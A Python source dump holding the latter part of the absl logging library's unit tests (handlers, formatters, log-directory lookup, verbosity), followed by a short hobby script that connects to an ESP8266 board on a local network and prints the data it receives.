cm = self.set_logger_levels({})
cm.__enter__()
self.addCleanup(lambda: cm.__exit__(None, None, None))
@contextlib.contextmanager
def set_logger_levels(self, levels):
original_levels = {
name: std_logging.getLogger(name).level for name in levels
}
try:
with flagsaver.flagsaver(logger_levels=levels):
yield
finally:
for name, level in original_levels.items():
std_logging.getLogger(name).setLevel(level)
def assert_logger_level(self, name, expected_level):
logger = std_logging.getLogger(name)
self.assertEqual(logger.level, expected_level)
def assert_logged(self, logger_name, expected_msgs):
logger = std_logging.getLogger(logger_name)
# NOTE: assertLogs() sets the logger to INFO if not specified.
with self.assertLogs(logger, logger.level) as cm:
logger.debug('debug')
logger.info('info')
logger.warning('warning')
logger.error('error')
logger.critical('critical')
actual = {r.getMessage() for r in cm.records}
self.assertEqual(set(expected_msgs), actual)
@unittest.skipIf(six.PY2, 'Py2 is missing assertLogs')
def test_setting_levels(self):
# Other tests change the root logging level, so we can't
# assume it's the default.
orig_root_level = std_logging.root.getEffectiveLevel()
with self.set_logger_levels({'foo': 'ERROR', 'bar': 'DEBUG'}):
self.assert_logger_level('foo', std_logging.ERROR)
self.assert_logger_level('bar', std_logging.DEBUG)
self.assert_logger_level('', orig_root_level)
self.assert_logged('foo', {'error', 'critical'})
self.assert_logged('bar',
{'debug', 'info', 'warning', 'error', 'critical'})
@parameterized.named_parameters(
('empty', ''),
('one_value', 'one:INFO'),
('two_values', 'one.a:INFO,two.b:ERROR'),
('whitespace_ignored', ' one : DEBUG , two : INFO'),
)
def test_serialize_parse(self, levels_str):
fl = FLAGS['logger_levels']
fl.parse(levels_str)
expected = levels_str.replace(' ', '')
actual = fl.serialize()
self.assertEqual('--logger_levels={}'.format(expected), actual)
def test_invalid_value(self):
with self.assertRaisesRegex(ValueError, 'Unknown level.*10'):
FLAGS['logger_levels'].parse('foo:10')
class PythonHandlerTest(absltest.TestCase):
"""Tests the PythonHandler class."""
def setUp(self):
(year, month, day, hour, minute, sec,
dunno, dayofyear, dst_flag) = (1979, 10, 21, 18, 17, 16, 3, 15, 0)
self.now_tuple = (year, month, day, hour, minute, sec,
dunno, dayofyear, dst_flag)
self.python_handler = logging.PythonHandler()
def tearDown(self):
mock.patch.stopall()
@flagsaver.flagsaver(logtostderr=False)
def test_set_google_log_file_no_log_to_stderr(self):
with mock.patch.object(self.python_handler, 'start_logging_to_file'):
self.python_handler.use_absl_log_file()
self.python_handler.start_logging_to_file.assert_called_once_with(
program_name=None, log_dir=None)
@flagsaver.flagsaver(logtostderr=True)
def test_set_google_log_file_with_log_to_stderr(self):
self.python_handler.stream = None
self.python_handler.use_absl_log_file()
self.assertEqual(sys.stderr, self.python_handler.stream)
@mock.patch.object(logging, 'find_log_dir_and_names')
@mock.patch.object(logging.time, 'localtime')
@mock.patch.object(logging.time, 'time')
@mock.patch.object(os.path, 'islink')
@mock.patch.object(os, 'unlink')
@mock.patch.object(os, 'getpid')
def test_start_logging_to_file(
self, mock_getpid, mock_unlink, mock_islink, mock_time,
mock_localtime, mock_find_log_dir_and_names):
mock_find_log_dir_and_names.return_value = ('here', 'prog1', 'prog1')
mock_time.return_value = '12345'
mock_localtime.return_value = self.now_tuple
mock_getpid.return_value = 4321
symlink = os.path.join('here', 'prog1.INFO')
mock_islink.return_value = True
with mock.patch.object(
logging, 'open', return_value=sys.stdout, create=True):
if getattr(os, 'symlink', None):
with mock.patch.object(os, 'symlink'):
self.python_handler.start_logging_to_file()
mock_unlink.assert_called_once_with(symlink)
os.symlink.assert_called_once_with(
'prog1.INFO.19791021-181716.4321', symlink)
else:
self.python_handler.start_logging_to_file()
def test_log_file(self):
handler = logging.PythonHandler()
self.assertEqual(sys.stderr, handler.stream)
stream = mock.Mock()
handler = logging.PythonHandler(stream)
self.assertEqual(stream, handler.stream)
def test_flush(self):
stream = mock.Mock()
handler = logging.PythonHandler(stream)
handler.flush()
stream.flush.assert_called_once()
def test_flush_with_value_error(self):
stream = mock.Mock()
stream.flush.side_effect = ValueError
handler = logging.PythonHandler(stream)
handler.flush()
stream.flush.assert_called_once()
def test_flush_with_environment_error(self):
stream = mock.Mock()
stream.flush.side_effect = EnvironmentError
handler = logging.PythonHandler(stream)
handler.flush()
stream.flush.assert_called_once()
def test_flush_with_assertion_error(self):
stream = mock.Mock()
stream.flush.side_effect = AssertionError
handler = logging.PythonHandler(stream)
with self.assertRaises(AssertionError):
handler.flush()
def test_log_to_std_err(self):
record = std_logging.LogRecord(
'name', std_logging.INFO, 'path', 12, 'logging_msg', [], False)
with mock.patch.object(std_logging.StreamHandler, 'emit'):
self.python_handler._log_to_stderr(record)
std_logging.StreamHandler.emit.assert_called_once_with(record)
@flagsaver.flagsaver(logtostderr=True)
def test_emit_log_to_stderr(self):
record = std_logging.LogRecord(
'name', std_logging.INFO, 'path', 12, 'logging_msg', [], False)
with mock.patch.object(self.python_handler, '_log_to_stderr'):
self.python_handler.emit(record)
self.python_handler._log_to_stderr.assert_called_once_with(record)
def test_emit(self):
stream = _StreamIO()
handler = logging.PythonHandler(stream)
handler.stderr_threshold = std_logging.FATAL
record = std_logging.LogRecord(
'name', std_logging.INFO, 'path', 12, 'logging_msg', [], False)
handler.emit(record)
self.assertEqual(1, stream.getvalue().count('logging_msg'))
@flagsaver.flagsaver(stderrthreshold='debug')
def test_emit_and_stderr_threshold(self):
mock_stderr = _StreamIO()
stream = _StreamIO()
handler = logging.PythonHandler(stream)
record = std_logging.LogRecord(
'name', std_logging.INFO, 'path', 12, 'logging_msg', [], False)
with mock.patch.object(sys, 'stderr', new=mock_stderr) as mock_stderr:
handler.emit(record)
self.assertEqual(1, stream.getvalue().count('logging_msg'))
self.assertEqual(1, mock_stderr.getvalue().count('logging_msg'))
@flagsaver.flagsaver(alsologtostderr=True)
def test_emit_also_log_to_stderr(self):
mock_stderr = _StreamIO()
stream = _StreamIO()
handler = logging.PythonHandler(stream)
handler.stderr_threshold = std_logging.FATAL
record = std_logging.LogRecord(
'name', std_logging.INFO, 'path', 12, 'logging_msg', [], False)
with mock.patch.object(sys, 'stderr', new=mock_stderr) as mock_stderr:
handler.emit(record)
self.assertEqual(1, stream.getvalue().count('logging_msg'))
self.assertEqual(1, mock_stderr.getvalue().count('logging_msg'))
def test_emit_on_stderr(self):
mock_stderr = _StreamIO()
with mock.patch.object(sys, 'stderr', new=mock_stderr) as mock_stderr:
handler = logging.PythonHandler()
handler.stderr_threshold = std_logging.INFO
record = std_logging.LogRecord(
'name', std_logging.INFO, 'path', 12, 'logging_msg', [], False)
handler.emit(record)
self.assertEqual(1, mock_stderr.getvalue().count('logging_msg'))
def test_emit_fatal_absl(self):
stream = _StreamIO()
handler = logging.PythonHandler(stream)
record = std_logging.LogRecord(
'name', std_logging.FATAL, 'path', 12, 'logging_msg', [], False)
record.__dict__[logging._ABSL_LOG_FATAL] = True
with mock.patch.object(handler, 'flush') as mock_flush:
with mock.patch.object(os, 'abort') as mock_abort:
handler.emit(record)
mock_abort.assert_called_once()
mock_flush.assert_called() # flush is also called by super class.
def test_emit_fatal_non_absl(self):
stream = _StreamIO()
handler = logging.PythonHandler(stream)
record = std_logging.LogRecord(
'name', std_logging.FATAL, 'path', 12, 'logging_msg', [], False)
with mock.patch.object(os, 'abort') as mock_abort:
handler.emit(record)
mock_abort.assert_not_called()
def test_close(self):
stream = mock.Mock()
stream.isatty.return_value = True
handler = logging.PythonHandler(stream)
with mock.patch.object(handler, 'flush') as mock_flush:
with mock.patch.object(std_logging.StreamHandler, 'close') as super_close:
handler.close()
mock_flush.assert_called_once()
super_close.assert_called_once()
stream.close.assert_not_called()
def test_close_afile(self):
stream = mock.Mock()
stream.isatty.return_value = False
stream.close.side_effect = ValueError
handler = logging.PythonHandler(stream)
with mock.patch.object(handler, 'flush') as mock_flush:
with mock.patch.object(std_logging.StreamHandler, 'close') as super_close:
handler.close()
mock_flush.assert_called_once()
super_close.assert_called_once()
def test_close_stderr(self):
with mock.patch.object(sys, 'stderr') as mock_stderr:
mock_stderr.isatty.return_value = False
handler = logging.PythonHandler(sys.stderr)
handler.close()
mock_stderr.close.assert_not_called()
def test_close_stdout(self):
with mock.patch.object(sys, 'stdout') as mock_stdout:
mock_stdout.isatty.return_value = False
handler = logging.PythonHandler(sys.stdout)
handler.close()
mock_stdout.close.assert_not_called()
def test_close_original_stderr(self):
with mock.patch.object(sys, '__stderr__') as mock_original_stderr:
mock_original_stderr.isatty.return_value = False
handler = logging.PythonHandler(sys.__stderr__)
handler.close()
mock_original_stderr.close.assert_not_called()
def test_close_original_stdout(self):
with mock.patch.object(sys, '__stdout__') as mock_original_stdout:
mock_original_stdout.isatty.return_value = False
handler = logging.PythonHandler(sys.__stdout__)
handler.close()
mock_original_stdout.close.assert_not_called()
def test_close_fake_file(self):
class FakeFile(object):
"""A file-like object that does not implement "isatty"."""
def __init__(self):
self.closed = False
def close(self):
self.closed = True
def flush(self):
pass
fake_file = FakeFile()
handler = logging.PythonHandler(fake_file)
handler.close()
self.assertTrue(fake_file.closed)
class PrefixFormatterTest(absltest.TestCase):
"""Tests the PrefixFormatter class."""
def setUp(self):
self.now_tuple = time.localtime(time.mktime(
(1979, 10, 21, 18, 17, 16, 3, 15, 1)))
self.new_prefix = lambda level: '(blah_prefix)'
mock.patch.object(time, 'time').start()
mock.patch.object(time, 'localtime').start()
self.record = std_logging.LogRecord(
'name', std_logging.INFO, 'path', 12, 'A Message', [], False)
self.formatter = logging.PythonFormatter()
def tearDown(self):
mock.patch.stopall()
@mock.patch.object(logging._thread_lib, 'get_ident')
def test_get_thread_id(self, mock_get_ident):
mock_get_ident.return_value = 12345
self.assertEqual(12345, logging._get_thread_id())
class ABSLHandlerTest(absltest.TestCase):
def setUp(self):
formatter = logging.PythonFormatter()
self.absl_handler = logging.ABSLHandler(formatter)
def test_activate_python_handler(self):
self.absl_handler.activate_python_handler()
self.assertEqual(
self.absl_handler._current_handler, self.absl_handler.python_handler)
class ABSLLoggerTest(absltest.TestCase):
"""Tests the ABSLLogger class."""
def set_up_mock_frames(self):
"""Sets up mock frames for use with the testFindCaller methods."""
logging_file = os.path.join('absl', 'logging', '__init__.py')
# Set up mock frame 0
mock_frame_0 = mock.Mock()
mock_code_0 = mock.Mock()
mock_code_0.co_filename = logging_file
mock_code_0.co_name = 'LoggingLog'
mock_code_0.co_firstlineno = 124
mock_frame_0.f_code = mock_code_0
mock_frame_0.f_lineno = 125
# Set up mock frame 1
mock_frame_1 = mock.Mock()
mock_code_1 = mock.Mock()
mock_code_1.co_filename = 'myfile.py'
mock_code_1.co_name = 'Method1'
mock_code_1.co_firstlineno = 124
mock_frame_1.f_code = mock_code_1
mock_frame_1.f_lineno = 125
# Set up mock frame 2
mock_frame_2 = mock.Mock()
mock_code_2 = mock.Mock()
mock_code_2.co_filename = 'myfile.py'
mock_code_2.co_name = 'Method2'
mock_code_2.co_firstlineno = 124
mock_frame_2.f_code = mock_code_2
mock_frame_2.f_lineno = 125
# Set up mock frame 3
mock_frame_3 = mock.Mock()
mock_code_3 = mock.Mock()
mock_code_3.co_filename = 'myfile.py'
mock_code_3.co_name = 'Method3'
mock_code_3.co_firstlineno = 124
mock_frame_3.f_code = mock_code_3
mock_frame_3.f_lineno = 125
# Set up mock frame 4 that has the same function name as frame 2.
mock_frame_4 = mock.Mock()
mock_code_4 = mock.Mock()
mock_code_4.co_filename = 'myfile.py'
mock_code_4.co_name = 'Method2'
mock_code_4.co_firstlineno = 248
mock_frame_4.f_code = mock_code_4
mock_frame_4.f_lineno = 249
# Tie them together.
mock_frame_4.f_back = None
mock_frame_3.f_back = mock_frame_4
mock_frame_2.f_back = mock_frame_3
mock_frame_1.f_back = mock_frame_2
mock_frame_0.f_back = mock_frame_1
mock.patch.object(sys, '_getframe').start()
sys._getframe.return_value = mock_frame_0
def setUp(self):
self.message = 'Hello Nurse'
self.logger = logging.ABSLLogger('')
def tearDown(self):
mock.patch.stopall()
self.logger._frames_to_skip.clear()
def test_constructor_without_level(self):
self.logger = logging.ABSLLogger('')
self.assertEqual(std_logging.NOTSET, self.logger.getEffectiveLevel())
def test_constructor_with_level(self):
self.logger = logging.ABSLLogger('', std_logging.DEBUG)
self.assertEqual(std_logging.DEBUG, self.logger.getEffectiveLevel())
def test_find_caller_normal(self):
self.set_up_mock_frames()
expected_name = 'Method1'
self.assertEqual(expected_name, self.logger.findCaller()[2])
def test_find_caller_skip_method1(self):
self.set_up_mock_frames()
self.logger.register_frame_to_skip('myfile.py', 'Method1')
expected_name = 'Method2'
self.assertEqual(expected_name, self.logger.findCaller()[2])
def test_find_caller_skip_method1_and_method2(self):
self.set_up_mock_frames()
self.logger.register_frame_to_skip('myfile.py', 'Method1')
self.logger.register_frame_to_skip('myfile.py', 'Method2')
expected_name = 'Method3'
self.assertEqual(expected_name, self.logger.findCaller()[2])
def test_find_caller_skip_method1_and_method3(self):
self.set_up_mock_frames()
self.logger.register_frame_to_skip('myfile.py', 'Method1')
# Skipping Method3 should change nothing since Method2 should be hit.
self.logger.register_frame_to_skip('myfile.py', 'Method3')
expected_name = 'Method2'
self.assertEqual(expected_name, self.logger.findCaller()[2])
def test_find_caller_skip_method1_and_method4(self):
self.set_up_mock_frames()
self.logger.register_frame_to_skip('myfile.py', 'Method1')
# Skipping frame 4's Method2 should change nothing for frame 2's Method2.
self.logger.register_frame_to_skip('myfile.py', 'Method2', 248)
expected_name = 'Method2'
expected_frame_lineno = 125
self.assertEqual(expected_name, self.logger.findCaller()[2])
self.assertEqual(expected_frame_lineno, self.logger.findCaller()[1])
def test_find_caller_skip_method1_method2_and_method3(self):
self.set_up_mock_frames()
self.logger.register_frame_to_skip('myfile.py', 'Method1')
self.logger.register_frame_to_skip('myfile.py', 'Method2', 124)
self.logger.register_frame_to_skip('myfile.py', 'Method3')
expected_name = 'Method2'
expected_frame_lineno = 249
self.assertEqual(expected_name, self.logger.findCaller()[2])
self.assertEqual(expected_frame_lineno, self.logger.findCaller()[1])
def test_find_caller_stack_info(self):
self.set_up_mock_frames()
self.logger.register_frame_to_skip('myfile.py', 'Method1')
with mock.patch.object(traceback, 'print_stack') as print_stack:
self.assertEqual(
('myfile.py', 125, 'Method2', 'Stack (most recent call last):'),
self.logger.findCaller(stack_info=True))
print_stack.assert_called_once()
@unittest.skipIf(six.PY3, 'Testing Python 2 specific behavior.')
def test_find_caller_python2(self):
"""Ensure that we only return three items for base class compatibility."""
self.set_up_mock_frames()
self.logger.register_frame_to_skip('myfile.py', 'Method1')
self.assertEqual(('myfile.py', 125, 'Method2'), self.logger.findCaller())
def test_critical(self):
with mock.patch.object(self.logger, 'log'):
self.logger.critical(self.message)
self.logger.log.assert_called_once_with(
std_logging.CRITICAL, self.message)
def test_fatal(self):
with mock.patch.object(self.logger, 'log'):
self.logger.fatal(self.message)
self.logger.log.assert_called_once_with(std_logging.FATAL, self.message)
def test_error(self):
with mock.patch.object(self.logger, 'log'):
self.logger.error(self.message)
self.logger.log.assert_called_once_with(std_logging.ERROR, self.message)
def test_warn(self):
with mock.patch.object(self.logger, 'log'):
self.logger.warn(self.message)
self.logger.log.assert_called_once_with(std_logging.WARN, self.message)
def test_warning(self):
with mock.patch.object(self.logger, 'log'):
self.logger.warning(self.message)
self.logger.log.assert_called_once_with(std_logging.WARNING, self.message)
def test_info(self):
with mock.patch.object(self.logger, 'log'):
self.logger.info(self.message)
self.logger.log.assert_called_once_with(std_logging.INFO, self.message)
def test_debug(self):
with mock.patch.object(self.logger, 'log'):
self.logger.debug(self.message)
self.logger.log.assert_called_once_with(std_logging.DEBUG, self.message)
def test_log_debug_with_python(self):
with mock.patch.object(self.logger, 'log'):
FLAGS.verbosity = 1
self.logger.debug(self.message)
self.logger.log.assert_called_once_with(std_logging.DEBUG, self.message)
def test_log_fatal_with_python(self):
with mock.patch.object(self.logger, 'log'):
self.logger.fatal(self.message)
self.logger.log.assert_called_once_with(std_logging.FATAL, self.message)
def test_register_frame_to_skip(self):
# This is basically just making sure that if I put something in a
# list, it actually appears in that list.
frame_tuple = ('file', 'method')
self.logger.register_frame_to_skip(*frame_tuple)
self.assertIn(frame_tuple, self.logger._frames_to_skip)
def test_register_frame_to_skip_with_lineno(self):
frame_tuple = ('file', 'method', 123)
self.logger.register_frame_to_skip(*frame_tuple)
self.assertIn(frame_tuple, self.logger._frames_to_skip)
def test_logger_cannot_be_disabled(self):
self.logger.disabled = True
record = self.logger.makeRecord(
'name', std_logging.INFO, 'fn', 20, 'msg', [], False)
with mock.patch.object(self.logger, 'callHandlers') as mock_call_handlers:
self.logger.handle(record)
mock_call_handlers.assert_called_once()
class ABSLLogPrefixTest(parameterized.TestCase):
def setUp(self):
self.record = std_logging.LogRecord(
'name', std_logging.INFO, 'path/to/source.py', 13, 'log message',
None, None)
@parameterized.named_parameters(
('debug', std_logging.DEBUG, 'I'),
('info', std_logging.INFO, 'I'),
('warning', std_logging.WARNING, 'W'),
('error', std_logging.ERROR, 'E'),
)
def test_default_prefixes(self, levelno, level_prefix):
self.record.levelno = levelno
self.record.created = 1494293880.378885
thread_id = '{: >5}'.format(logging._get_thread_id())
# Use UTC so the test passes regardless of the local time zone.
with mock.patch.object(time, 'localtime', side_effect=time.gmtime):
self.assertEqual(
'{}0509 01:38:00.378885 {} source.py:13] '.format(
level_prefix, thread_id),
logging.get_absl_log_prefix(self.record))
time.localtime.assert_called_once_with(self.record.created)
def test_absl_prefix_regex(self):
self.record.created = 1226888258.0521369
# Use UTC so the test passes regardless of the local time zone.
with mock.patch.object(time, 'localtime', side_effect=time.gmtime):
prefix = logging.get_absl_log_prefix(self.record)
match = re.search(logging.ABSL_LOGGING_PREFIX_REGEX, prefix)
self.assertTrue(match)
expect = {'severity': 'I',
'month': '11',
'day': '17',
'hour': '02',
'minute': '17',
'second': '38',
'microsecond': '052136',
'thread_id': str(logging._get_thread_id()),
'filename': 'source.py',
'line': '13',
}
actual = {name: match.group(name) for name in expect}
self.assertEqual(expect, actual)
def test_critical_absl(self):
self.record.levelno = std_logging.CRITICAL
self.record.created = 1494293880.378885
self.record._absl_log_fatal = True
thread_id = '{: >5}'.format(logging._get_thread_id())
# Use UTC so the test passes regardless of the local time zone.
with mock.patch.object(time, 'localtime', side_effect=time.gmtime):
self.assertEqual(
'F0509 01:38:00.378885 {} source.py:13] '.format(thread_id),
logging.get_absl_log_prefix(self.record))
time.localtime.assert_called_once_with(self.record.created)
def test_critical_non_absl(self):
self.record.levelno = std_logging.CRITICAL
self.record.created = 1494293880.378885
thread_id = '{: >5}'.format(logging._get_thread_id())
# Use UTC so the test passes regardless of the local time zone.
with mock.patch.object(time, 'localtime', side_effect=time.gmtime):
self.assertEqual(
'E0509 01:38:00.378885 {} source.py:13] CRITICAL - '.format(
thread_id),
logging.get_absl_log_prefix(self.record))
time.localtime.assert_called_once_with(self.record.created)
class LogCountTest(absltest.TestCase):
def test_counter_threadsafe(self):
threads_start = threading.Event()
counts = set()
k = object()
def t():
threads_start.wait()
counts.add(logging._get_next_log_count_per_token(k))
threads = [threading.Thread(target=t) for _ in range(100)]
for thread in threads:
thread.start()
threads_start.set()
for thread in threads:
thread.join()
self.assertEqual(counts, {i for i in range(100)})
class LoggingTest(absltest.TestCase):
def test_fatal(self):
with mock.patch.object(os, 'abort') as mock_abort:
logging.fatal('Die!')
mock_abort.assert_called_once()
def test_find_log_dir_with_arg(self):
with mock.patch.object(os, 'access'), \
mock.patch.object(os.path, 'isdir'):
os.path.isdir.return_value = True
os.access.return_value = True
log_dir = logging.find_log_dir(log_dir='./')
self.assertEqual('./', log_dir)
@flagsaver.flagsaver(log_dir='./')
def test_find_log_dir_with_flag(self):
with mock.patch.object(os, 'access'), \
mock.patch.object(os.path, 'isdir'):
os.path.isdir.return_value = True
os.access.return_value = True
log_dir = logging.find_log_dir()
self.assertEqual('./', log_dir)
@flagsaver.flagsaver(log_dir='')
def test_find_log_dir_with_hda_tmp(self):
with mock.patch.object(os, 'access'), \
mock.patch.object(os.path, 'exists'), \
mock.patch.object(os.path, 'isdir'):
os.path.exists.return_value = True
os.path.isdir.return_value = True
os.access.return_value = True
log_dir = logging.find_log_dir()
self.assertEqual('/tmp/', log_dir)
@flagsaver.flagsaver(log_dir='')
def test_find_log_dir_with_tmp(self):
with mock.patch.object(os, 'access'), \
mock.patch.object(os.path, 'exists'), \
mock.patch.object(os.path, 'isdir'):
os.path.exists.return_value = False
os.path.isdir.side_effect = lambda path: path == '/tmp/'
os.access.return_value = True
log_dir = logging.find_log_dir()
self.assertEqual('/tmp/', log_dir)
def test_find_log_dir_with_nothing(self):
with mock.patch.object(os.path, 'exists'), \
mock.patch.object(os.path, 'isdir'), \
mock.patch.object(logging.get_absl_logger(), 'fatal') as mock_fatal:
os.path.exists.return_value = False
os.path.isdir.return_value = False
log_dir = logging.find_log_dir()
mock_fatal.assert_called()
self.assertEqual(None, log_dir)
def test_find_log_dir_and_names_with_args(self):
user = 'test_user'
host = 'test_host'
log_dir = 'here'
program_name = 'prog1'
with mock.patch.object(getpass, 'getuser'), \
mock.patch.object(logging, 'find_log_dir') as mock_find_log_dir, \
mock.patch.object(socket, 'gethostname') as mock_gethostname:
getpass.getuser.return_value = user
mock_gethostname.return_value = host
mock_find_log_dir.return_value = log_dir
prefix = '%s.%s.%s.log' % (program_name, host, user)
self.assertEqual((log_dir, prefix, program_name),
logging.find_log_dir_and_names(
program_name=program_name, log_dir=log_dir))
def test_find_log_dir_and_names_without_args(self):
user = 'test_user'
host = 'test_host'
log_dir = 'here'
py_program_name = 'py_prog1'
sys.argv[0] = 'path/to/prog1'
with mock.patch.object(getpass, 'getuser'), \
mock.patch.object(logging, 'find_log_dir') as mock_find_log_dir, \
mock.patch.object(socket, 'gethostname'):
getpass.getuser.return_value = user
socket.gethostname.return_value = host
mock_find_log_dir.return_value = log_dir
prefix = '%s.%s.%s.log' % (py_program_name, host, user)
self.assertEqual((log_dir, prefix, py_program_name),
logging.find_log_dir_and_names())
def test_find_log_dir_and_names_wo_username(self):
# Windows doesn't have os.getuid at all
if hasattr(os, 'getuid'):
mock_getuid = mock.patch.object(os, 'getuid')
uid = 100
logged_uid = '100'
else:
# The function doesn't exist, but our test code still tries to mock
# it, so just use a fake thing.
mock_getuid = _mock_windows_os_getuid()
uid = -1
logged_uid = 'unknown'
host = 'test_host'
log_dir = 'here'
program_name = 'prog1'
with mock.patch.object(getpass, 'getuser'), \
mock_getuid as getuid, \
mock.patch.object(logging, 'find_log_dir') as mock_find_log_dir, \
mock.patch.object(socket, 'gethostname') as mock_gethostname:
getpass.getuser.side_effect = KeyError()
getuid.return_value = uid
mock_gethostname.return_value = host
mock_find_log_dir.return_value = log_dir
prefix = '%s.%s.%s.log' % (program_name, host, logged_uid)
self.assertEqual((log_dir, prefix, program_name),
logging.find_log_dir_and_names(
program_name=program_name, log_dir=log_dir))
def test_errors_in_logging(self):
with mock.patch.object(sys, 'stderr', new=_StreamIO()) as stderr:
logging.info('not enough args: %s %s', 'foo') # pylint: disable=logging-too-few-args
self.assertIn('Traceback (most recent call last):', stderr.getvalue())
self.assertIn('TypeError', stderr.getvalue())
def test_dict_arg(self):
# Tests that passing a dictionary as a single argument does not crash.
logging.info('%(test)s', {'test': 'Hello world!'})
def test_exception_dict_format(self):
# Just verify that this doesn't raise a TypeError.
logging.exception('%(test)s', {'test': 'Hello world!'})
def test_logging_levels(self):
old_level = logging.get_verbosity()
logging.set_verbosity(logging.DEBUG)
self.assertEquals(logging.get_verbosity(), logging.DEBUG)
self.assertTrue(logging.level_debug())
self.assertTrue(logging.level_info())
self.assertTrue(logging.level_warning())
self.assertTrue(logging.level_error())
logging.set_verbosity(logging.INFO)
self.assertEquals(logging.get_verbosity(), logging.INFO)
self.assertFalse(logging.level_debug())
self.assertTrue(logging.level_info())
self.assertTrue(logging.level_warning())
self.assertTrue(logging.level_error())
logging.set_verbosity(logging.WARNING)
self.assertEquals(logging.get_verbosity(), logging.WARNING)
self.assertFalse(logging.level_debug())
self.assertFalse(logging.level_info())
self.assertTrue(logging.level_warning())
self.assertTrue(logging.level_error())
logging.set_verbosity(logging.ERROR)
self.assertEquals(logging.get_verbosity(), logging.ERROR)
self.assertFalse(logging.level_debug())
self.assertFalse(logging.level_info())
self.assertTrue(logging.level_error())
logging.set_verbosity(old_level)
def test_set_verbosity_strings(self):
old_level = logging.get_verbosity()
# Lowercase names.
logging.set_verbosity('debug')
self.assertEquals(logging.get_verbosity(), logging.DEBUG)
logging.set_verbosity('info')
self.assertEquals(logging.get_verbosity(), logging.INFO)
logging.set_verbosity('warning')
self.assertEquals(logging.get_verbosity(), logging.WARNING)
logging.set_verbosity('warn')
self.assertEquals(logging.get_verbosity(), logging.WARNING)
logging.set_verbosity('error')
self.assertEquals(logging.get_verbosity(), logging.ERROR)
logging.set_verbosity('fatal')
# Uppercase names.
self.assertEquals(logging.get_verbosity(), logging.FATAL)
logging.set_verbosity('DEBUG')
self.assertEquals(logging.get_verbosity(), logging.DEBUG)
logging.set_verbosity('INFO')
self.assertEquals(logging.get_verbosity(), logging.INFO)
logging.set_verbosity('WARNING')
self.assertEquals(logging.get_verbosity(), logging.WARNING)
logging.set_verbosity('WARN')
self.assertEquals(logging.get_verbosity(), logging.WARNING)
logging.set_verbosity('ERROR')
self.assertEquals(logging.get_verbosity(), logging.ERROR)
logging.set_verbosity('FATAL')
self.assertEquals(logging.get_verbosity(), logging.FATAL)
# Integers as strings.
logging.set_verbosity(str(logging.DEBUG))
self.assertEquals(logging.get_verbosity(), logging.DEBUG)
logging.set_verbosity(str(logging.INFO))
self.assertEquals(logging.get_verbosity(), logging.INFO)
logging.set_verbosity(str(logging.WARNING))
self.assertEquals(logging.get_verbosity(), logging.WARNING)
logging.set_verbosity(str(logging.ERROR))
self.assertEquals(logging.get_verbosity(), logging.ERROR)
logging.set_verbosity(str(logging.FATAL))
self.assertEquals(logging.get_verbosity(), logging.FATAL)
logging.set_verbosity(old_level)
def test_key_flags(self):
key_flags = FLAGS.get_key_flags_for_module(logging)
key_flag_names = [flag.name for flag in key_flags]
self.assertIn('stderrthreshold', key_flag_names)
self.assertIn('verbosity', key_flag_names)
def test_get_absl_logger(self):
self.assertIsInstance(
logging.get_absl_logger(), logging.ABSLLogger)
def test_get_absl_handler(self):
self.assertIsInstance(
logging.get_absl_handler(), logging.ABSLHandler)
@mock.patch.object(logging.ABSLLogger, 'register_frame_to_skip')
class LogSkipPrefixTest(absltest.TestCase):
"""Tests for logging.skip_log_prefix."""
def _log_some_info(self):
"""Logging helper function for LogSkipPrefixTest."""
logging.info('info')
def _log_nested_outer(self):
"""Nested logging helper functions for LogSkipPrefixTest."""
def _log_nested_inner():
logging.info('info nested')
return _log_nested_inner
def test_skip_log_prefix_with_name(self, mock_skip_register):
retval = logging.skip_log_prefix('_log_some_info')
mock_skip_register.assert_called_once_with(__file__, '_log_some_info', None)
self.assertEqual(retval, '_log_some_info')
def test_skip_log_prefix_with_func(self, mock_skip_register):
retval = logging.skip_log_prefix(self._log_some_info)
mock_skip_register.assert_called_once_with(
__file__, '_log_some_info', mock.ANY)
self.assertEqual(retval, self._log_some_info)
def test_skip_log_prefix_with_functools_partial(self, mock_skip_register):
partial_input = functools.partial(self._log_some_info)
with self.assertRaises(ValueError):
_ = logging.skip_log_prefix(partial_input)
mock_skip_register.assert_not_called()
def test_skip_log_prefix_with_lambda(self, mock_skip_register):
lambda_input = lambda _: self._log_some_info()
retval = logging.skip_log_prefix(lambda_input)
mock_skip_register.assert_called_once_with(__file__, '<lambda>', mock.ANY)
self.assertEqual(retval, lambda_input)
def test_skip_log_prefix_with_bad_input(self, mock_skip_register):
dict_input = {1: 2, 2: 3}
with self.assertRaises(TypeError):
_ = logging.skip_log_prefix(dict_input)
mock_skip_register.assert_not_called()
def test_skip_log_prefix_with_nested_func(self, mock_skip_register):
nested_input = self._log_nested_outer()
retval = logging.skip_log_prefix(nested_input)
mock_skip_register.assert_called_once_with(
__file__, '_log_nested_inner', mock.ANY)
self.assertEqual(retval, nested_input)
def test_skip_log_prefix_decorator(self, mock_skip_register):
@logging.skip_log_prefix
def _log_decorated():
logging.info('decorated')
del _log_decorated
mock_skip_register.assert_called_once_with(
__file__, '_log_decorated', mock.ANY)
@contextlib.contextmanager
def override_python_handler_stream(stream):
handler = logging.get_absl_handler().python_handler
old_stream = handler.stream
handler.stream = stream
try:
yield
finally:
handler.stream = old_stream
class GetLogFileNameTest(parameterized.TestCase):
@parameterized.named_parameters(
('err', sys.stderr),
('out', sys.stdout),
)
def test_get_log_file_name_py_std(self, stream):
with override_python_handler_stream(stream):
self.assertEqual('', logging.get_log_file_name())
def test_get_log_file_name_py_no_name(self):
class FakeFile(object):
pass
with override_python_handler_stream(FakeFile()):
self.assertEqual('', logging.get_log_file_name())
def test_get_log_file_name_py_file(self):
_, filename = tempfile.mkstemp(dir=FLAGS.test_tmpdir)
with open(filename, 'a') as stream:
with override_python_handler_stream(stream):
self.assertEqual(filename, logging.get_log_file_name())
@contextlib.contextmanager
def _mock_windows_os_getuid():
yield mock.MagicMock()
if __name__ == '__main__':
absltest.main()
|
pc_keyboard-check.py
|
#!/usr/bin/python3.7
#encoding:utf-8
import pynput
import threading
from socket import *
import threading
address="192.168.31.106" #8266的服务器的ip地址
port=8266 #8266的服务器的端口号
buffsize=1024 #接收数据的缓存大小
s=socket(AF_INET, SOCK_STREAM)
s.connect((address,port))
def fun():
while True:
recvdata=s.recv(buffsize).decode('utf-8')
print("\n接收的数据是:"+recvdata)
#for i in recvdata:
# if(i is not 0):
# print('%#x' % ord(i))
t = threading.Thread(target=fun) # t为新创建的线程,专门用来接收从服务器发送过来的数据
t.start()
#while True:
# senddata=input('\n想要发送的数据:')
# if senddata=='exit':
# break
